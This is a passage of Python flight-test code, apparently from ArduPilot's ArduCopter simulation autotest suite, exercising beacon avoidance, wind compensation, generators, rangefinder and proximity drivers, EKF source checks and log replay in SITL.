self.wait_groundspeed(0, 0.3, timeout=120)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_beacon_avoidance_test(self):
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", int(SITL_START_LOCATION.lat))
self.set_parameter("BCN_LONGITUDE", int(SITL_START_LOCATION.lng))
self.set_parameter("BCN_ORIENT_YAW", 45)
self.set_parameter("AVOID_ENABLE", 4)
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.362919, 149.165055, 0, 0)
self.wait_location(west_loc, accuracy=7)
self.reach_heading_manual(0)
north_loc = mavutil.location(-35.362881, 149.165103, 0, 0)
self.wait_location(north_loc, accuracy=7)
self.set_rc(2, 1500)
self.set_rc(1, 1600)
east_loc = mavutil.location(-35.362986, 149.165227, 0, 0)
self.wait_location(east_loc, accuracy=7)
self.set_rc(1, 1500)
self.set_rc(2, 1600)
south_loc = mavutil.location(-35.363025, 149.165182, 0, 0)
self.wait_location(south_loc, accuracy=7)
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_wind_baro_compensation(self):
self.context_push()
ex = None
try:
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto'))],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
wind_spd_truth = 8.0
wind_dir_truth = 90.0
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.set_parameter("BARO1_WCF_ENABLE", 1.000000)
self.reboot_sitl()
self.set_parameter("EK3_DRAG_BCOEF_X", 361.000000)
self.set_parameter("EK3_DRAG_BCOEF_Y", 361.000000)
self.set_parameter("EK3_DRAG_MCOEF", 0.082000)
self.set_parameter("BARO1_WCF_FWD", -0.300000)
self.set_parameter("BARO1_WCF_BCK", -0.300000)
self.set_parameter("BARO1_WCF_RGT", 0.300000)
self.set_parameter("BARO1_WCF_LFT", 0.300000)
self.set_parameter("SIM_BARO_WCF_FWD", -0.300000)
self.set_parameter("SIM_BARO_WCF_BAK", -0.300000)
self.set_parameter("SIM_BARO_WCF_RGT", 0.300000)
self.set_parameter("SIM_BARO_WCF_LFT", 0.300000)
self.set_parameter("SIM_WIND_DIR", wind_dir_truth)
self.set_parameter("SIM_WIND_SPD", wind_spd_truth)
self.set_parameter("SIM_WIND_T", 1.000000)
self.reboot_sitl()
# require_absolute=True infers a GPS is present
self.wait_ready_to_arm(require_absolute=False)
self.progress("Climb to 20m in LOITER and yaw spin for 30 seconds")
self.takeoff(10, mode="LOITER")
self.set_rc(4, 1400)
self.delay_sim_time(30)
# check wind esitmates
m = self.mav.recv_match(type='WIND', blocking=True)
speed_error = abs(m.speed - wind_spd_truth)
angle_error = abs(m.direction - wind_dir_truth)
if (speed_error > 1.0):
raise NotAchievedException("Wind speed incorrect - want %f +-1 got %f m/s" % (wind_spd_truth, m.speed))
if (angle_error > 15.0):
raise NotAchievedException(
"Wind direction incorrect - want %f +-15 got %f deg" %
(wind_dir_truth, m.direction))
self.progress("Wind estimate is good, now check height variation for 30 seconds")
# check height stability over another 30 seconds
z_min = 1E6
z_max = -1E6
tstart = self.get_sim_time()
while (self.get_sim_time() < tstart + 30):
m = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
if (m.z > z_max):
z_max = m.z
if (m.z < z_min):
z_min = m.z
if (z_max-z_min > 0.5):
raise NotAchievedException("Height variation is excessive")
self.progress("Height variation is good")
self.set_rc(4, 1500)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def wait_generator_speed_and_state(self, rpm_min, rpm_max, want_state, timeout=240):
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not move to state/speed")
m = self.mav.recv_match(type="GENERATOR_STATUS", blocking=True, timeout=10)
if m is None:
raise NotAchievedException("Did not get GENERATOR_STATUS")
if m.generator_speed < rpm_min:
self.progress("Too slow (%u<%u)" % (m.generator_speed, rpm_min))
continue
if m.generator_speed > rpm_max:
self.progress("Too fast (%u>%u)" % (m.generator_speed, rpm_max))
continue
if m.status != want_state:
self.progress("Wrong state (got=%u want=%u)" % (m.status, want_state))
break
self.progress("Got generator speed and state")
def test_richenpower(self):
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SIM_RICH_ENABLE", 1)
self.set_parameter("SERVO8_FUNCTION", 42)
self.set_parameter("SIM_RICH_CTRL", 8)
self.set_parameter("RC9_OPTION", 85)
self.set_parameter("LOG_DISARMED", 1)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("GEN_TYPE", 3)
self.reboot_sitl()
self.set_rc(9, 1000) # remember this is a switch position - stop
self.customise_SITL_commandline(["--uartF=sim:richenpower"])
self.wait_statustext("requested state is not RUN", timeout=60)
self.set_message_rate_hz("GENERATOR_STATUS", 10)
self.drain_mav_unparsed()
self.wait_generator_speed_and_state(0, 0, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_OFF)
messages = []
def my_message_hook(mav, m):
if m.get_type() != 'STATUSTEXT':
return
messages.append(m)
self.install_message_hook(my_message_hook)
try:
self.set_rc(9, 2000) # remember this is a switch position - run
finally:
self.remove_message_hook(my_message_hook)
if "Generator HIGH" not in [x.text for x in messages]:
self.wait_statustext("Generator HIGH", timeout=60)
self.set_rc(9, 1000) # remember this is a switch position - stop
self.wait_statustext("requested state is not RUN", timeout=200)
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 8000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.set_rc(9, 2000) # remember this is a switch position - run
# self.wait_generator_speed_and_state(3000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_WARMING_UP)
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
bs = self.mav.recv_match(
type="BATTERY_STATUS",
condition="BATTERY_STATUS.id==1", # id is zero-indexed
timeout=1,
blocking=True
)
if bs is None:
raise NotAchievedException("Did not receive BATTERY_STATUS")
self.progress("Received battery status: %s" % str(bs))
want_bs_volt = 50000
if bs.voltages[0] != want_bs_volt:
raise NotAchievedException("Battery voltage not as expected (want=%f) got=(%f)" % (want_bs_volt, bs.voltages[0],))
self.progress("Moving *back* to idle")
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 10000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.progress("Moving *back* to run")
self.set_rc(9, 2000) # remember this is a switch position - run
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
self.set_message_rate_hz("GENERATOR_STATUS", -1)
self.set_parameter("LOG_DISARMED", 0)
if not self.current_onboard_log_contains_message("GEN"):
raise NotAchievedException("Did not find expected GEN message")
def test_ie24(self):
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SERIAL5_BAUD", 115200)
self.set_parameter("GEN_TYPE", 2)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("SIM_IE24_ENABLE", 1)
self.set_parameter("LOG_DISARMED", 1)
self.customise_SITL_commandline(["--uartF=sim:ie24"])
self.wait_ready_to_arm()
self.arm_vehicle()
self.disarm_vehicle()
# Test for pre-arm check fail when state is not running
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
self.set_parameter("SIM_IE24_STATE", 8)
self.wait_statustext("Status not running", timeout=40)
self.try_arm(result=False,
expect_msg="Status not running")
self.set_parameter("SIM_IE24_STATE", 2) # Explicitly set state to running
# Test that error code does result in failsafe
self.start_subtest("If you haven't taken off generator error should cause instant failsafe and disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_IE24_ERROR", 30)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_IE24_ERROR", 0)
self.set_parameter("DISARM_DELAY", 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_aux_switch_options(self):
self.set_parameter("RC7_OPTION", 58) # clear waypoints
self.load_mission("copter_loiter_to_alt.txt")
self.set_rc(7, 1000)
self.assert_mission_count(5)
self.progress("Clear mission")
self.set_rc(7, 2000)
self.delay_sim_time(1) # allow switch to debounce
self.assert_mission_count(0)
self.set_rc(7, 1000)
self.set_parameter("RC7_OPTION", 24) # reset mission
self.delay_sim_time(2)
self.load_mission("copter_loiter_to_alt.txt")
set_wp = 4
self.set_current_waypoint(set_wp)
self.wait_current_waypoint(set_wp, timeout=10)
self.progress("Reset mission")
self.set_rc(7, 2000)
self.delay_sim_time(1)
self.drain_mav()
self.wait_current_waypoint(0, timeout=10)
self.set_rc(7, 1000)
def test_aux_functions_in_mission(self):
self.load_mission("aux_functions.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_mode('ALT_HOLD')
self.change_mode('AUTO')
self.wait_rtl_complete()
def fly_rangefinder_drivers_fly(self, rangefinders):
'''ensure rangefinder gives height-above-ground'''
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0)
)
for i in range(0, len(rangefinders)):
name = rangefinders[i]
self.progress("i=%u (%s)" % (i, name))
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message for id==%u (%s)" % (i, name))
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
raise NotAchievedException(
"distance sensor.current_distance (%f) (%s) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, name, gpi.relative_alt/1000.0))
self.land_and_disarm()
self.progress("Ensure RFND messages in log")
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("No RFND messages in log")
def fly_proximity_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink proximity sensor using DISTANCE_SENSOR messages") # noqa
self.context_push()
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("PRX_TYPE", 2) # mavlink
self.reboot_sitl()
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
50, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_PROXIMITY, True, True, False)
# now make sure we get echoed back the same sorts of things we send:
# distances are in cm
distance_map = {
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE: 30,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_45: 35,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_90: 20,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_135: 15,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_180: 70,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_225: 80,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_270: 10,
mavutil.mavlink.MAV_SENSOR_ROTATION_YAW_315: 90,
}
wanted_distances = copy.copy(distance_map)
sensor_enum = mavutil.mavlink.enums["MAV_SENSOR_ORIENTATION"]
def my_message_hook(mav, m):
if m.get_type() != 'DISTANCE_SENSOR':
return
self.progress("Got (%s)" % str(m))
want = distance_map[m.orientation]
got = m.current_distance
# ArduPilot's floating point conversions make it imprecise:
delta = abs(want-got)
if delta > 1:
self.progress(
"Wrong distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
return
if m.orientation not in wanted_distances:
return
self.progress(
"Correct distance (%s): want=%f got=%f" %
(sensor_enum[m.orientation].name, want, got))
del wanted_distances[m.orientation]
self.install_message_hook_context(my_message_hook)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not give right distances") # noqa
for (orient, dist) in distance_map.items():
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
90, # max_distance cm
dist, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
orient, # orientation
255 # covariance
)
self.wait_heartbeat()
if len(wanted_distances.keys()) == 0:
break
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_mavlink_distance_sensor(self):
self.start_subtest("Test mavlink rangefinder using DISTANCE_SENSOR messages")
self.context_push()
self.set_parameter('RTL_ALT_TYPE', 0)
ex = None
try:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.reboot_sitl()
self.set_parameter("RNGFND1_MAX_CM", 32767)
self.progress("Should be unhealthy while we don't send messages")
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Should be healthy while we're sending good messages")
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Sensor did not come good")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance
50, # max_distance
20, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
if self.sensor_has_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, True):
self.progress("Sensor has good state")
break
self.delay_sim_time(0.1)
self.progress("Should be unhealthy again if we stop sending messages")
self.delay_sim_time(1)
self.assert_sensor_state(mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION, True, True, False)
self.progress("Landing gear should deploy with current_distance below min_distance")
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_parameter("SERVO10_FUNCTION", 29)
self.set_parameter("LGR_DEPLOY_ALT", 1)
self.set_parameter("LGR_RETRACT_ALT", 10) # metres
self.delay_sim_time(1) # servo function maps only periodically updated
# self.send_debug_trap()
self.run_cmd(
mavutil.mavlink.MAV_CMD_AIRFRAME_CONFIGURATION,
0,
0, # deploy
0,
0,
0,
0,
0
)
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
2500, # max_distance (cm)
200, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.context_collect("STATUSTEXT")
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Retraction did not happen")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
100, # min_distance (cm)
6000, # max_distance (cm)
1500, # current_distance (cm)
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
self.delay_sim_time(0.1)
try:
self.wait_text("LandingGear: RETRACT", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Retracted")
break
# self.send_debug_trap()
while True:
if self.get_sim_time_cached() - tstart > 5:
raise NotAchievedException("Deployment did not happen")
self.progress("Sending distance-sensor message")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
300, # min_distance
500, # max_distance
250, # current_distance
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_PITCH_270, # orientation
255 # covariance
)
try:
self.wait_text("LandingGear: DEPLOY", check_context=True, timeout=0.1)
except Exception:
continue
self.progress("Deployed")
break
self.disarm_vehicle()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_gsf(self):
'''test the Gaussian Sum filter'''
ex = None
self.context_push()
try:
self.set_parameter("EK2_ENABLE", 1)
self.reboot_sitl()
self.takeoff(20, mode='LOITER')
self.set_rc(2, 1400)
self.delay_sim_time(5)
self.set_rc(2, 1500)
self.progress("Path: %s" % self.current_onboard_log_filepath())
dfreader = self.dfreader_for_current_onboard_log()
self.do_RTL()
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# ensure log messages present
want = set(["XKY0", "XKY1", "NKY0", "NKY1"])
still_want = want
while len(still_want):
m = dfreader.recv_match(type=want)
if m is None:
raise NotAchievedException("Did not get %s" % want)
still_want.remove(m.get_type())
def fly_rangefinder_mavlink(self):
self.fly_rangefinder_mavlink_distance_sensor()
# explicit test for the mavlink driver as it doesn't play so nice:
self.set_parameter("SERIAL5_PROTOCOL", 1)
self.set_parameter("RNGFND1_TYPE", 10)
self.customise_SITL_commandline(['--uartF=sim:rf_mavlink'])
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
expected_alt = 5
self.user_takeoff(alt_min=expected_alt)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 5:
raise NotAchievedException("Mavlink rangefinder not working")
rf = self.mav.recv_match(type="RANGEFINDER", timeout=1, blocking=True)
if rf is None:
raise NotAchievedException("Did not receive rangefinder message")
gpi = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
if gpi is None:
raise NotAchievedException("Did not receive GLOBAL_POSITION_INT message")
if abs(rf.distance - gpi.relative_alt/1000.0) > 1:
print("rangefinder alt (%s) disagrees with global-position-int.relative_alt (%s)" %
(rf.distance, gpi.relative_alt/1000.0))
continue
ds = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=2,
blocking=True,
)
if ds is None:
raise NotAchievedException("Did not receive DISTANCE_SENSOR message")
self.progress("Got: %s" % str(ds))
if abs(ds.current_distance/100.0 - gpi.relative_alt/1000.0) > 1:
print(
"distance sensor.current_distance (%f) disagrees with global-position-int.relative_alt (%s)" %
(ds.current_distance/100.0, gpi.relative_alt/1000.0))
continue
break
self.progress("mavlink rangefinder OK")
self.land_and_disarm()
def fly_rangefinder_driver_maxbotix(self):
ex = None
try:
self.context_push()
self.start_subtest("No messages")
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
if rf is not None:
raise NotAchievedException("Receiving DISTANCE_SENSOR when I shouldn't be")
self.start_subtest("Default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to default address")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Explicitly set to non-default address")
self.set_parameter("RNGFND1_ADDR", 0x71)
self.reboot_sitl()
self.do_timesync_roundtrip()
rf = self.mav.recv_match(type="DISTANCE_SENSOR", timeout=5, blocking=True)
self.progress("Got (%s)" % str(rf))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
self.start_subtest("Two MaxBotix RangeFinders")
self.set_parameter("RNGFND1_TYPE", 2) # maxbotix
self.set_parameter("RNGFND1_ADDR", 0x70)
self.set_parameter("RNGFND1_MIN_CM", 150)
self.set_parameter("RNGFND2_TYPE", 2) # maxbotix
self.set_parameter("RNGFND2_ADDR", 0x71)
self.set_parameter("RNGFND2_MIN_CM", 250)
self.reboot_sitl()
self.do_timesync_roundtrip()
for i in [0, 1]:
rf = self.mav.recv_match(
type="DISTANCE_SENSOR",
timeout=5,
blocking=True,
condition="DISTANCE_SENSOR.id==%u" % i
)
self.progress("Got id==%u (%s)" % (i, str(rf)))
if rf is None:
raise NotAchievedException("Didn't receive DISTANCE_SENSOR when I should've")
expected_dist = 150
if i == 1:
expected_dist = 250
if rf.min_distance != expected_dist:
raise NotAchievedException("Unexpected min_cm (want=%u got=%u)" %
(expected_dist, rf.min_distance))
self.context_pop()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.reboot_sitl()
if ex is not None:
raise ex
def fly_rangefinder_drivers(self):
self.set_parameter("RTL_ALT", 500)
self.set_parameter("RTL_ALT_TYPE", 1)
drivers = [
("lightwareserial", 8), # autodetected between this and -binary
("lightwareserial-binary", 8),
("ulanding_v0", 11),
("ulanding_v1", 11),
("leddarone", 12),
("maxsonarseriallv", 13),
("nmea", 17),
("wasp", 18),
("benewake_tf02", 19),
("blping", 23),
("benewake_tfmini", 20),
("lanbao", 26),
("benewake_tf03", 27),
("gyus42v2", 31),
]
while len(drivers):
do_drivers = drivers[0:3]
drivers = drivers[3:]
command_line_args = []
for (offs, cmdline_argument, serial_num) in [(0, '--uartE', 4),
(1, '--uartF', 5),
(2, '--uartG', 6)]:
if len(do_drivers) > offs:
(sim_name, rngfnd_param_value) = do_drivers[offs]
command_line_args.append("%s=sim:%s" %
(cmdline_argument, sim_name))
serial_param_name = "SERIAL%u_PROTOCOL" % serial_num
self.set_parameter(serial_param_name, 9) # rangefinder
self.set_parameter("RNGFND%u_TYPE" % (offs+1), rngfnd_param_value)
self.customise_SITL_commandline(command_line_args)
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
self.fly_rangefinder_mavlink()
i2c_drivers = [
("maxbotixi2cxl", 2),
]
while len(i2c_drivers):
do_drivers = i2c_drivers[0:9]
i2c_drivers = i2c_drivers[9:]
count = 1
for d in do_drivers:
(sim_name, rngfnd_param_value) = d
self.set_parameter("RNGFND%u_TYPE" % count, rngfnd_param_value)
count += 1
self.reboot_sitl()
self.fly_rangefinder_drivers_fly([x[0] for x in do_drivers])
def fly_ship_takeoff(self):
# test ship takeoff
self.wait_groundspeed(0, 2)
self.set_parameter("SIM_SHIP_ENABLE", 1)
self.set_parameter("SIM_SHIP_SPEED", 10)
self.set_parameter("SIM_SHIP_DSIZE", 2)
self.wait_ready_to_arm()
# we should be moving with the ship
self.wait_groundspeed(9, 11)
self.takeoff(10)
# above ship our speed drops to 0
self.wait_groundspeed(0, 2)
self.land_and_disarm()
# ship will have moved on, so we land on the water which isn't moving
self.wait_groundspeed(0, 2)
def test_parameter_validation(self):
# wait 10 seconds for initialisation
self.delay_sim_time(10)
self.progress("invalid; min must be less than max:")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 50)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; min must be less than max (equal case):")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (min=0)")
self.set_parameter("MOT_PWM_MIN", 0)
self.set_parameter("MOT_PWM_MAX", 100)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
self.progress("invalid; both must be non-zero or both zero (max=0)")
self.set_parameter("MOT_PWM_MIN", 100)
self.set_parameter("MOT_PWM_MAX", 0)
self.drain_mav()
self.assert_prearm_failure("Check MOT_PWM_MIN/MAX")
def test_alt_estimate_prearm(self):
self.context_push()
ex = None
try:
# disable barometer so there is no altitude source
self.set_parameter("SIM_BARO_DISABLE", 1)
self.set_parameter("SIM_BARO2_DISABL", 1)
self.wait_gps_disable(position_vertical=True)
# turn off arming checks (mandatory arming checks will still be run)
self.set_parameter("ARMING_CHECK", 0)
# delay 12 sec to allow EKF to lose altitude estimate
self.delay_sim_time(12)
self.change_mode("ALT_HOLD")
self.assert_prearm_failure("Need Alt Estimate")
# force arm vehicle in stabilize to bypass barometer pre-arm checks
self.change_mode("STABILIZE")
self.arm_vehicle()
self.set_rc(3, 1700)
try:
self.change_mode("ALT_HOLD", timeout=10)
except AutoTestTimeoutException:
self.progress("PASS not able to set mode without Position : %s" % "ALT_HOLD")
# check that mode change to ALT_HOLD has failed (it should)
if self.mode_is("ALT_HOLD"):
raise NotAchievedException("Changed to ALT_HOLD with no altitude estimate")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def test_ekf_source(self):
self.context_push()
ex = None
try:
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.wait_ready_to_arm()
self.start_subtest("bad yaw source")
self.set_parameter("EK3_SRC3_YAW", 17)
self.assert_prearm_failure("Check EK3_SRC3_YAW")
self.context_push()
self.start_subtest("missing required yaw source")
self.set_parameter("EK3_SRC3_YAW", 3) # External Yaw with Compass Fallback
self.set_parameter("COMPASS_USE", 0)
self.set_parameter("COMPASS_USE2", 0)
self.set_parameter("COMPASS_USE3", 0)
self.assert_prearm_failure("EK3 sources require Compass")
self.context_pop()
except Exception as e:
self.disarm_vehicle(force=True)
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_replay_gps_bit(self):
self.set_parameters({
"LOG_REPLAY": 1,
"LOG_DISARMED": 1,
"EK3_ENABLE": 1,
"EK2_ENABLE": 1,
"AHRS_TRIM_X": 0.01,
"AHRS_TRIM_Y": -0.03,
"GPS_TYPE2": 1,
"GPS_POS1_X": 0.1,
"GPS_POS1_Y": 0.2,
"GPS_POS1_Z": 0.3,
"GPS_POS2_X": -0.1,
"GPS_POS2_Y": -0.02,
"GPS_POS2_Z": -0.31,
"INS_POS1_X": 0.12,
"INS_POS1_Y": 0.14,
"INS_POS1_Z": -0.02,
"INS_POS2_X": 0.07,
"INS_POS2_Y": 0.012,
"INS_POS2_Z": -0.06,
"RNGFND1_TYPE": 1,
"RNGFND1_PIN": 0,
"RNGFND1_SCALING": 30,
"RNGFND1_POS_X": 0.17,
"RNGFND1_POS_Y": -0.07,
"RNGFND1_POS_Z": -0.005,
"SIM_SONAR_SCALE": 30,
"SIM_GPS2_DISABLE": 0,
})
self.reboot_sitl()
current_log_filepath = self.current_onboard_log_filepath()
self.progress("Current log path: %s" % str(current_log_filepath))
self.change_mode("LOITER")
self.wait_ready_to_arm(require_absolute=True)
self.arm_vehicle()
self.takeoffAndMoveAway()
self.do_RTL()
self.reboot_sitl()
return current_log_filepath
def test_replay_beacon_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_beacon_position()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
return log_difference[2]
def test_replay_optical_flow_bit(self):
self.set_parameter("LOG_REPLAY", 1)
self.set_parameter("LOG_DISARMED", 1)
old_onboard_logs = sorted(self.log_list())
self.fly_optical_flow_limits()
new_onboard_logs = sorted(self.log_list())
log_difference = [x for x in new_onboard_logs if x not in old_onboard_logs]
print("log difference: %s" % str(log_difference))
return log_difference[0]
def test_gps_blending(self):
'''ensure we get dataflash log messages for blended instance'''
self.context_push()
ex = None
try:
# configure:
self.set_parameter("GPS_TYPE2", 1)
self.set_parameter("SIM_GPS2_TYPE", 1)
self.set_parameter("SIM_GPS2_DISABLE", 0)
self.set_parameter("GPS_AUTO_SWITCH", 2)
self.reboot_sitl()
# ensure we're seeing the second GPS:
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 60:
raise NotAchievedException("Did not get good GPS2_RAW message")
m = self.mav.recv_match(type='GPS2_RAW', blocking=True, timeout=1)
self.progress("%s" % str(m))
if m is None:
continue
if m.lat == 0:
continue
break
# create a log we can expect blended data to appear in:
self.change_mode('LOITER')
